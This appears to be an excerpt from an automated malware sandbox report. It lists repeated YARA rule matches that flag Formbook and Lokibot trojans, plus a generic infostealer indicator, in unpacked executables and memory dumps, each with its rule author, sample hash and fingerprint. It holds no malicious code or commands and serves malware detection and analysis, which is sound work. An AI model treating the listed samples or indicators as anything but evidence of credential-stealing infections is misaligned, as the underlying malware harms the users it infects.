                    Source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.audiodgse.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.audiodgse.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000002.1375358332.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000014.00000002.2491293063.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000014.00000002.2475106067.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000025.00000002.2495734545.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000014.00000002.2489028637.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000C.00000002.2535197131.000000000E498000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
                    Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000002.1369508767.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                    Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
